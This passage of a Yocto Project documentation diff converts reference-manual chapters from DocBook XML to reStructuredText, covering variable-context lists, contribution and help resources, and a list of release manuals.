-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-varlocality'>
-    <title>Variable Context</title>
-
-    <para>
-        While you can use most variables in almost any context such as
-        <filename>.conf</filename>, <filename>.bbclass</filename>,
-        <filename>.inc</filename>, and <filename>.bb</filename> files,
-        some variables are often associated with a particular locality or context.
-        This chapter describes some common associations.
-    </para>
-
-    <section id='ref-varlocality-configuration'>
-        <title>Configuration</title>
-
-        <para>
-            The following subsections provide lists of variables whose context is
-            configuration: distribution, machine, and local.
-        </para>
-
-        <section id='ref-varlocality-config-distro'>
-            <title>Distribution (Distro)</title>
-
-            <para>
-               This section lists variables whose configuration context is the
-               distribution, or distro.
-               <itemizedlist>
-                   <listitem><para><filename><link linkend='var-DISTRO'>DISTRO</link></filename></para></listitem>
-                   <listitem><para><filename><link linkend='var-DISTRO_NAME'>DISTRO_NAME</link></filename>
-                       </para></listitem>
-                   <listitem><para><filename><link linkend='var-DISTRO_VERSION'>DISTRO_VERSION</link>
-                       </filename></para></listitem>
-                   <listitem><para><filename><link linkend='var-MAINTAINER'>MAINTAINER</link></filename>
-                       </para></listitem>
-                   <listitem><para><filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link>
-                       </filename></para></listitem>
-                   <listitem><para><filename><link linkend='var-TARGET_OS'>TARGET_OS</link></filename>
-                       </para></listitem>
-                   <listitem><para><filename><link linkend='var-TARGET_FPU'>TARGET_FPU</link></filename>
-                       </para></listitem>
-                   <listitem><para><filename><link linkend='var-TCMODE'>TCMODE</link></filename>
-                       </para></listitem>
-                   <listitem><para><filename><link linkend='var-TCLIBC'>TCLIBC</link></filename>
-                       </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='ref-varlocality-config-machine'>
-            <title>Machine</title>
-
-            <para>
-                This section lists variables whose configuration context is the
-                machine.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-TARGET_ARCH'>TARGET_ARCH</link></filename>
-                        </para></listitem>
-                    <listitem><para><filename><link linkend='var-SERIAL_CONSOLES'>SERIAL_CONSOLES</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-PACKAGE_EXTRA_ARCHS'>PACKAGE_EXTRA_ARCHS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-IMAGE_FSTYPES'>IMAGE_FSTYPES</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE_EXTRA_RDEPENDS'>MACHINE_EXTRA_RDEPENDS
-                        </link></filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE_EXTRA_RRECOMMENDS'>MACHINE_EXTRA_RRECOMMENDS
-                        </link></filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'>MACHINE_ESSENTIAL_EXTRA_RDEPENDS
-                        </link></filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'>
-                        MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</link></filename></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='ref-varlocality-config-local'>
-            <title>Local</title>
-
-            <para>
-                This section lists variables whose configuration context is the
-                local configuration through the <filename>local.conf</filename>
-                file.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-DISTRO'>DISTRO</link></filename>
-                        </para></listitem>
-                    <listitem><para><filename><link linkend='var-MACHINE'>MACHINE</link></filename>
-                        </para></listitem>
-                    <listitem><para><filename><link linkend='var-DL_DIR'>DL_DIR</link></filename>
-                        </para></listitem>
-                    <listitem><para><filename><link linkend='var-BBFILES'>BBFILES</link></filename>
-                        </para></listitem>
-                    <listitem><para><filename><link linkend='var-EXTRA_IMAGE_FEATURES'>EXTRA_IMAGE_FEATURES
-                        </link></filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-BB_NUMBER_THREADS'>BB_NUMBER_THREADS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-BBINCLUDELOGS'>BBINCLUDELOGS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-ENABLE_BINARY_LOCALE_GENERATION'>
-                        ENABLE_BINARY_LOCALE_GENERATION</link></filename></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id='ref-varlocality-recipes'>
-        <title>Recipes</title>
-
-        <para>
-            The following subsections provide lists of variables whose context is
-            recipes: required, dependencies, path, and extra build information.
-        </para>
-
-        <section id='ref-varlocality-recipe-required'>
-            <title>Required</title>
-
-            <para>
-                This section lists variables that are required for recipes.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-LICENSE'>LICENSE</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-LIC_FILES_CHKSUM'>LIC_FILES_CHKSUM</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-SRC_URI'>SRC_URI</link></filename> - used
-                        in recipes that fetch local or remote files.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='ref-varlocality-recipe-dependencies'>
-            <title>Dependencies</title>
-
-            <para>
-                This section lists variables that define recipe dependencies.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-DEPENDS'>DEPENDS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-RDEPENDS'>RDEPENDS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-RRECOMMENDS'>RRECOMMENDS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-RCONFLICTS'>RCONFLICTS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-RREPLACES'>RREPLACES</link>
-                        </filename></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='ref-varlocality-recipe-paths'>
-            <title>Paths</title>
-
-            <para>
-                This section lists variables that define recipe paths.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-WORKDIR'>WORKDIR</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-S'>S</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-FILES'>FILES</link>
-                        </filename></para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='ref-varlocality-recipe-build'>
-            <title>Extra Build Information</title>
-
-            <para>
-                This section lists variables that define extra build information for recipes.
-                <itemizedlist>
-                    <listitem><para><filename><link linkend='var-DEFAULT_PREFERENCE'>DEFAULT_PREFERENCE
-                        </link></filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-EXTRA_OECMAKE'>EXTRA_OECMAKE</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-EXTRA_OECONF'>EXTRA_OECONF</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-EXTRA_OEMAKE'>EXTRA_OEMAKE</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-PACKAGECONFIG_CONFARGS'>PACKAGECONFIG_CONFARGS</link>
-                        </filename></para></listitem>
-                    <listitem><para><filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4 spell spelllang=en_gb
--->
diff --git a/documentation/ref-manual/resources.rst b/documentation/ref-manual/resources.rst
new file mode 100644
index 0000000000..2ef182fb1c
--- /dev/null
+++ b/documentation/ref-manual/resources.rst
@@ -0,0 +1,197 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************************************
+Contributions and Additional Information
+****************************************
+
+.. _resources-intro:
+
+Introduction
+============
+
+The Yocto Project team is happy for people to experiment with the Yocto
+Project. A number of places exist to find help if you run into
+difficulties or find bugs. This presents information about contributing
+and participating in the Yocto Project.
+
+.. _resources-contributions:
+
+Contributions
+=============
+
+The Yocto Project gladly accepts contributions. You can submit changes
+to the project either by creating and sending pull requests, or by
+submitting patches through email. For information on how to do both as
+well as information on how to identify the maintainer for each area of
+code, see the ":ref:`how-to-submit-a-change`" section in the
+Yocto Project Development Tasks Manual.
+
+.. _resources-bugtracker:
+
+Yocto Project Bugzilla
+======================
+
+The Yocto Project uses its own implementation of
+:yocto_bugs:`Bugzilla <>` to track defects (bugs).
+Implementations of Bugzilla work well for group development because they
+track bugs and code changes, can be used to communicate changes and
+problems with developers, can be used to submit and review patches, and
+can be used to manage quality assurance.
+
+Sometimes it is helpful to submit, investigate, or track a bug against
+the Yocto Project itself (e.g. when discovering an issue with some
+component of the build system that acts contrary to the documentation or
+your expectations).
+
+A general procedure and guidelines exist for when you use Bugzilla to
+submit a bug. For information on how to use Bugzilla to submit a bug
+against the Yocto Project, see the following:
+
+-  The ":ref:`dev-manual/dev-manual-common-tasks:submitting a defect against the yocto project`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  The Yocto Project :yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+
+For information on Bugzilla in general, see http://www.bugzilla.org/about/.
+
+.. _resources-mailinglist:
+
+Mailing lists
+=============
+
+A number of mailing lists maintained by the Yocto Project exist as well
+as related OpenEmbedded mailing lists for discussion, patch submission
+and announcements. To subscribe to one of the following mailing lists,
+click on the appropriate URL in the following list and follow the
+instructions:
+
+-  :yocto_lists:`/g/yocto` - General Yocto Project
+   discussion mailing list.
+
+-  :oe_lists:`/g/openembedded-core` - Discussion mailing
+   list about OpenEmbedded-Core (the core metadata).
+
+-  :oe_lists:`/g/openembedded-devel` - Discussion
+   mailing list about OpenEmbedded.
+
+-  :oe_lists:`/g/bitbake-devel` - Discussion mailing
+   list about the :term:`BitBake` build tool.
+
+-  :yocto_lists:`/g/poky` - Discussion mailing list
+   about :term:`Poky`.
+
+-  :yocto_lists:`/g/yocto-announce` - Mailing list to
+   receive official Yocto Project release and milestone announcements.
+
+For more Yocto Project-related mailing lists, see the
+:yocto_home:`Yocto Project Website <>`.
+
+.. _resources-irc:
+
+Internet Relay Chat (IRC)
+=========================
+
+Two IRC channels on freenode are available for the Yocto Project and
+Poky discussions:
+
+-  ``#yocto``
+
+-  ``#poky``
+
+.. _resources-links-and-related-documentation:
+
+Links and Related Documentation
+===============================
+
+Here is a list of resources you might find helpful:
+
+-  :yocto_home:`The Yocto Project Website <>`\ *:* The home site
+   for the Yocto Project.
+
+-  :yocto_wiki:`The Yocto Project Main Wiki Page </wiki/Main_Page>`\ *:* The main wiki page for
+   the Yocto Project. This page contains information about project
+   planning, release engineering, QA & automation, a reference site map,
+   and other resources related to the Yocto Project.
+
+-  :oe_home:`OpenEmbedded <>`\ *:* The build system used by the
+   Yocto Project. This project is the upstream, generic, embedded
+   distribution from which the Yocto Project derives its build system
+   (Poky) and to which it contributes.
+
+-  :oe_home:`BitBake </wiki/BitBake>`\ *:* The tool
+   used to process metadata.
+
+-  :doc:`BitBake User Manual <bitbake:index>`\ *:* A comprehensive
+   guide to the BitBake tool. If you want information on BitBake, see
+   this manual.
+
+-  :doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` *:* This
+   short document lets you experience building an image using the Yocto
+   Project without having to understand any concepts or details.
+
+-  :doc:`../overview-manual/overview-manual` *:* This manual provides overview
+   and conceptual information about the Yocto Project.
+
+-  :doc:`../dev-manual/dev-manual` *:* This manual is a "how-to" guide
+   that presents procedures useful to both application and system
+   developers who use the Yocto Project.
+
+-  :doc:`../sdk-manual/sdk-manual` *manual :* This
+   guide provides information that lets you get going with the standard
+   or extensible SDK. An SDK, with its cross-development toolchains,
+   allows you to develop projects inside or outside of the Yocto Project
+   environment.
+
+-  :doc:`../bsp-guide/bsp` *:* This guide defines the structure
+   for BSP components. Having a commonly understood structure encourages
+   standardization.
+
+-  :doc:`../kernel-dev/kernel-dev` *:* This manual describes
+   how to work with Linux Yocto kernels as well as provides a bit of
+   conceptual information on the construction of the Yocto Linux kernel
+   tree.
+
+-  :doc:`../ref-manual/ref-manual` *:* This
+   manual provides reference material such as variable, task, and class
+   descriptions.
+
+-  :yocto_docs:`Yocto Project Mega-Manual </singleindex.html>`\ *:* This manual
+   is simply a single HTML file comprised of the bulk of the Yocto
+   Project manuals. The Mega-Manual primarily exists as a vehicle by
+   which you can easily search for phrases and terms used in the Yocto
+   Project documentation set.
+
+-  :doc:`../profile-manual/profile-manual` *:* This manual presents a set of
+   common and generally useful tracing and profiling schemes along with
+   their applications (as appropriate) to each tool.
+
+-  :doc:`../toaster-manual/toaster-manual` *:* This manual
+   introduces and describes how to set up and use Toaster. Toaster is an
+   Application Programming Interface (API) and web-based interface to
+   the :term:`OpenEmbedded Build System`, which uses
+   BitBake, that reports build information.
+
+-  :yocto_wiki:`FAQ </wiki/FAQ>`\ *:* A list of commonly asked
+   questions and their answers.
+
+-  *Release Notes:* Features, updates and known issues for the current
+   release of the Yocto Project. To access the Release Notes, go to the
+   :yocto_home:`Downloads </software-overview/downloads>` page on
+   the Yocto Project website and click on the "RELEASE INFORMATION" link
+   for the appropriate release.
+
+-  :yocto_bugs:`Bugzilla <>`\ *:* The bug tracking application
+   the Yocto Project uses. If you find problems with the Yocto Project,
+   you should report them using this application.
+
+-  :yocto_wiki:`Bugzilla Configuration and Bug Tracking Wiki Page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`\ *:*
+   Information on how to get set up and use the Yocto Project
+   implementation of Bugzilla for logging and tracking Yocto Project
+   defects.
+
+-  *Internet Relay Chat (IRC):* Two IRC channels on freenode are
+   available for Yocto Project and Poky discussions: ``#yocto`` and
+   ``#poky``, respectively.
+
+-  `Quick EMUlator (QEMU) <http://wiki.qemu.org/Index.html>`__\ *:* An
+   open-source machine emulator and virtualizer.
diff --git a/documentation/ref-manual/resources.xml b/documentation/ref-manual/resources.xml
deleted file mode 100644
index afe8e288de..0000000000
--- a/documentation/ref-manual/resources.xml
+++ /dev/null
@@ -1,297 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='resources'>
-<title>Contributions and Additional Information</title>
-
-<section id='resources-intro'>
-    <title>Introduction</title>
-    <para>
-        The Yocto Project team is happy for people to experiment with the
-        Yocto Project.
-        A number of places exist to find help if you run into difficulties
-        or find bugs.
-        This presents information about contributing and participating in
-        the Yocto Project.
-    </para>
-</section>
-
-<section id='resources-contributions'>
-    <title>Contributions</title>
-
-    <para>
-        The Yocto Project gladly accepts contributions.
-        You can submit changes to the project either by creating and sending
-        pull requests,
-        or by submitting patches through email.
-        For information on how to do both as well as information on how
-        to identify the maintainer for each area of code, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-</section>
-
-<section id='resources-bugtracker'>
-    <title>Yocto Project Bugzilla</title>
-
-    <para>
-        The Yocto Project uses its own implementation of
-        <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink> to
-        track defects (bugs).
-        Implementations of Bugzilla work well for group development because
-        they track bugs and code changes, can be used to communicate changes
-        and problems with developers, can be used to submit and review patches,
-        and can be used to manage quality assurance.
-    </para>
-
-    <para>
-        Sometimes it is helpful to submit, investigate, or track a bug against
-        the Yocto Project itself (e.g. when discovering an issue with some
-        component of the build system that acts contrary to the documentation
-        or your expectations).
-    </para>
-
-    <para>
-        A general procedure and guidelines exist for when you use Bugzilla to
-        submit a bug.
-        For information on how to use Bugzilla to submit a bug against the
-        Yocto Project, see the following:
-        <itemizedlist>
-            <listitem><para>
-                The
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#submitting-a-defect-against-the-yocto-project'>Submitting a Defect Against the Yocto Project</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para>
-                The Yocto Project
-                <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla wiki page</ulink>
-                </para></listitem>
-        </itemizedlist>
-        For information on Bugzilla in general, see
-        <ulink url='http://www.bugzilla.org/about/'></ulink>.
-    </para>
-</section>
-
-<section id='resources-mailinglist'>
-    <title>Mailing lists</title>
-
-    <para>
-        A number of mailing lists maintained by the Yocto Project exist
-        as well as related OpenEmbedded mailing lists for discussion,
-        patch submission and announcements.
-        To subscribe to one of the following mailing lists, click on the
-        appropriate URL in the following list and follow the instructions:
-        <itemizedlist>
-            <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/yocto'></ulink> -
-                General Yocto Project discussion mailing list. </para></listitem>
-            <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/openembedded-core'></ulink> -
-                Discussion mailing list about OpenEmbedded-Core (the core metadata).</para></listitem>
-            <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/openembedded-devel'></ulink> -
-                Discussion mailing list about OpenEmbedded.</para></listitem>
-            <listitem><para><ulink url='&OE_LISTS_URL;/listinfo/bitbake-devel'></ulink> -
-                Discussion mailing list about the
-                <link linkend='bitbake-term'>BitBake</link>
-                build tool.</para></listitem>
-            <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/poky'></ulink> -
-                Discussion mailing list about
-                <link linkend='poky'>Poky</link>.
-                </para></listitem>
-            <listitem><para><ulink url='&YOCTO_LISTS_URL;/listinfo/yocto-announce'></ulink> -
-                Mailing list to receive official Yocto Project release and milestone
-                announcements.</para></listitem>
-        </itemizedlist>
-    </para>
-    For more Yocto Project-related mailing lists, see the
-    <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
-</section>
-
-<section id='resources-irc'>
-    <title>Internet Relay Chat (IRC)</title>
-
-    <para>
-        Two IRC channels on freenode are available for the Yocto Project and Poky discussions:
-        <itemizedlist>
-            <listitem><para><filename>#yocto</filename></para></listitem>
-            <listitem><para><filename>#poky</filename></para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='resources-links-and-related-documentation'>
-    <title>Links and Related Documentation</title>
-
-    <para>
-        Here is a list of resources you might find helpful:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_HOME_URL;'>The Yocto Project website</ulink>:
-                </emphasis> The home site for the Yocto Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_WIKI_URL;/wiki/Main_Page'>The Yocto Project Main Wiki Page</ulink>:
-                </emphasis>
-                The main wiki page for the Yocto Project.
-                This page contains information about project planning,
-                release engineering, QA &amp; automation, a reference
-                site map, and other resources related to the Yocto Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&OE_HOME_URL;'>OpenEmbedded</ulink>:
-                </emphasis>
-                The build system used by the Yocto Project.
-                This project is the upstream, generic, embedded distribution
-                from which the Yocto Project derives its build system (Poky)
-                and to which it contributes.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='http://www.openembedded.org/wiki/BitBake'>
-                BitBake</ulink>:
-                </emphasis> The tool used to process metadata.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>:
-                </emphasis>
-                A comprehensive guide to the BitBake tool.
-                If you want information on BitBake, see this manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>:
-                </emphasis>
-                This short document lets you experience building an image using
-                the Yocto Project without having to understand any concepts or
-                details.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_OM_URL;'>Yocto Project Overview and Concepts Manual</ulink>:
-                </emphasis>
-                This manual provides overview and conceptual information
-                about the Yocto Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_DEV_URL;'>Yocto Project Development Tasks Manual</ulink>:
-                </emphasis>
-                This manual is a "how-to" guide that presents procedures
-                useful to both application and system developers who use the
-                Yocto Project.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                manual:</emphasis>
-                This guide provides information that lets you get going
-                with the standard or extensible SDK.
-                An SDK, with its cross-development toolchains, allows you
-                to develop projects inside or outside of the Yocto Project
-                environment.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>:
-                </emphasis>
-                This guide defines the structure for BSP components.
-                Having a commonly understood structure encourages
-                standardization.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>:
-                </emphasis>
-                This manual describes how to work with Linux Yocto kernels as
-                well as provides a bit of conceptual information on the
-                construction of the Yocto Linux kernel tree.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>:
-                </emphasis>
-                This manual provides reference material such as variable,
-                task, and class descriptions.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_MM_URL;'>Yocto Project Mega-Manual</ulink>:
-                </emphasis>
-                This manual is simply a single HTML file comprised of the
-                bulk of the Yocto Project manuals.
-                The Mega-Manual primarily exists as a vehicle by which you can
-                easily search for phrases and terms used in the Yocto Project
-                documentation set.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_PROF_URL;'>Yocto Project Profiling and Tracing Manual</ulink>:
-                </emphasis>
-                This manual presents a set of common and generally useful
-                tracing and profiling schemes along with their applications
-                (as appropriate) to each tool.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>:
-                </emphasis>
-                This manual introduces and describes how to set up and use
-                Toaster.
-                Toaster is an Application Programming Interface (API) and
-                web-based interface to the
-                <link linkend='build-system-term'>OpenEmbedded Build System</link>,
-                which uses BitBake, that reports build information.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_WIKI_URL;/wiki/FAQ'>FAQ</ulink>:
-                </emphasis>
-                A list of commonly asked questions and their answers.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Release Notes:</emphasis>
-                Features, updates and known issues for the current
-                release of the Yocto Project.
-                To access the Release Notes, go to the
-                <ulink url='&YOCTO_HOME_URL;/software-overview/downloads/'>Downloads</ulink>
-                page on the Yocto Project website and click on the
-                "RELEASE INFORMATION" link for the appropriate release.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_BUGZILLA_URL;'>Bugzilla</ulink>:
-                </emphasis>
-                The bug tracking application the Yocto Project uses.
-                If you find problems with the Yocto Project, you should report
-                them using this application.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='&YOCTO_WIKI_URL;/wiki/Bugzilla_Configuration_and_Bug_Tracking'>Bugzilla Configuration and Bug Tracking Wiki Page</ulink>:
-                </emphasis>
-                Information on how to get set up and use the Yocto Project
-                implementation of Bugzilla for logging and tracking Yocto
-                Project defects.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Internet Relay Chat (IRC):</emphasis>
-                Two IRC channels on freenode are available
-                for Yocto Project and Poky discussions: <filename>#yocto</filename> and
-                <filename>#poky</filename>, respectively.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>
-                <ulink url='http://wiki.qemu.org/Index.html'>Quick EMUlator (QEMU)</ulink>:
-                </emphasis>
-                An open-source machine emulator and virtualizer.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/releases.rst b/documentation/releases.rst
new file mode 100644
index 0000000000..affe63403c
--- /dev/null
+++ b/documentation/releases.rst
@@ -0,0 +1,228 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+===========================
+ Supported Release Manuals
+===========================
+
+******************************
+Release Series 3.4 (honister)
+******************************
+
+- :yocto_docs:`3.4 Documentation </3.4>`
+- :yocto_docs:`3.4.1 Documentation </3.4.1>`
+
+******************************
+Release Series 3.3 (hardknott)
+******************************
+
+- :yocto_docs:`3.3 Documentation </3.3>`
+- :yocto_docs:`3.3.1 Documentation </3.3.1>`
+- :yocto_docs:`3.3.2 Documentation </3.3.2>`
+- :yocto_docs:`3.3.3 Documentation </3.3.3>`
+- :yocto_docs:`3.3.4 Documentation </3.3.4>`
+
+****************************
+Release Series 3.1 (dunfell)
+****************************
+
+- :yocto_docs:`3.1 Documentation </3.1>`
+- :yocto_docs:`3.1.1 Documentation </3.1.1>`
+- :yocto_docs:`3.1.2 Documentation </3.1.2>`
+- :yocto_docs:`3.1.3 Documentation </3.1.3>`
+- :yocto_docs:`3.1.4 Documentation </3.1.4>`
+- :yocto_docs:`3.1.5 Documentation </3.1.5>`
+- :yocto_docs:`3.1.6 Documentation </3.1.6>`
+- :yocto_docs:`3.1.7 Documentation </3.1.7>`
+- :yocto_docs:`3.1.8 Documentation </3.1.8>`
+- :yocto_docs:`3.1.9 Documentation </3.1.9>`
+- :yocto_docs:`3.1.10 Documentation </3.1.10>`
+- :yocto_docs:`3.1.11 Documentation </3.1.11>`
+- :yocto_docs:`3.1.12 Documentation </3.1.12>`
+- :yocto_docs:`3.1.13 Documentation </3.1.13>`
+- :yocto_docs:`3.1.14 Documentation </3.1.14>`
+
+==========================
+ Outdated Release Manuals
+==========================
+
+*******************************
+Release Series 3.2 (gatesgarth)
+*******************************
+
+- :yocto_docs:`3.2 Documentation </3.2>`
+- :yocto_docs:`3.2.1 Documentation </3.2.1>`
+- :yocto_docs:`3.2.2 Documentation </3.2.2>`
+- :yocto_docs:`3.2.3 Documentation </3.2.3>`
+- :yocto_docs:`3.2.4 Documentation </3.2.4>`
+
+*************************
+Release Series 3.0 (zeus)
+*************************
+
+- :yocto_docs:`3.0 Documentation </3.0>`
+- :yocto_docs:`3.0.1 Documentation </3.0.1>`
+- :yocto_docs:`3.0.2 Documentation </3.0.2>`
+- :yocto_docs:`3.0.3 Documentation </3.0.3>`
+- :yocto_docs:`3.0.4 Documentation </3.0.4>`
+
+****************************
+Release Series 2.7 (warrior)
+****************************
+
+- :yocto_docs:`2.7 Documentation </2.7>`
+- :yocto_docs:`2.7.1 Documentation </2.7.1>`
+- :yocto_docs:`2.7.2 Documentation </2.7.2>`
+- :yocto_docs:`2.7.3 Documentation </2.7.3>`
+- :yocto_docs:`2.7.4 Documentation </2.7.4>`
+
+*************************
+Release Series 2.6 (thud)
+*************************
+
+- :yocto_docs:`2.6 Documentation </2.6>`
+- :yocto_docs:`2.6.1 Documentation </2.6.1>`
+- :yocto_docs:`2.6.2 Documentation </2.6.2>`
+- :yocto_docs:`2.6.3 Documentation </2.6.3>`
+- :yocto_docs:`2.6.4 Documentation </2.6.4>`
+
+*************************
+Release Series 2.5 (sumo)
+*************************
+
+- :yocto_docs:`2.5 Documentation </2.5>`
+- :yocto_docs:`2.5.1 Documentation </2.5.1>`
+- :yocto_docs:`2.5.2 Documentation </2.5.2>`
+- :yocto_docs:`2.5.3 Documentation </2.5.3>`
+
+**************************
+Release Series 2.4 (rocko)
+**************************
+
+- :yocto_docs:`2.4 Documentation </2.4>`
+- :yocto_docs:`2.4.1 Documentation </2.4.1>`
+- :yocto_docs:`2.4.2 Documentation </2.4.2>`
+- :yocto_docs:`2.4.3 Documentation </2.4.3>`
+- :yocto_docs:`2.4.4 Documentation </2.4.4>`
+
+*************************
+Release Series 2.3 (pyro)
+*************************
+
+- :yocto_docs:`2.3 Documentation </2.3>`
+- :yocto_docs:`2.3.1 Documentation </2.3.1>`
+- :yocto_docs:`2.3.2 Documentation </2.3.2>`
+- :yocto_docs:`2.3.3 Documentation </2.3.3>`
+- :yocto_docs:`2.3.4 Documentation </2.3.4>`
+
+**************************
+Release Series 2.2 (morty)
+**************************
+
+- :yocto_docs:`2.2 Documentation </2.2>`
+- :yocto_docs:`2.2.1 Documentation </2.2.1>`
+- :yocto_docs:`2.2.2 Documentation </2.2.2>`
+- :yocto_docs:`2.2.3 Documentation </2.2.3>`
+
+****************************
+Release Series 2.1 (krogoth)
+****************************
+
+- :yocto_docs:`2.1 Documentation </2.1>`
+- :yocto_docs:`2.1.1 Documentation </2.1.1>`
+- :yocto_docs:`2.1.2 Documentation </2.1.2>`
+- :yocto_docs:`2.1.3 Documentation </2.1.3>`
+
+***************************
+Release Series 2.0 (jethro)
+***************************
+
+- :yocto_docs:`1.9 Documentation </1.9>`
+- :yocto_docs:`2.0 Documentation </2.0>`
+- :yocto_docs:`2.0.1 Documentation </2.0.1>`
+- :yocto_docs:`2.0.2 Documentation </2.0.2>`
+- :yocto_docs:`2.0.3 Documentation </2.0.3>`
+
+*************************
+Release Series 1.8 (fido)
+*************************
+
+- :yocto_docs:`1.8 Documentation </1.8>`
+- :yocto_docs:`1.8.1 Documentation </1.8.1>`
+- :yocto_docs:`1.8.2 Documentation </1.8.2>`
+
+**************************
+Release Series 1.7 (dizzy)
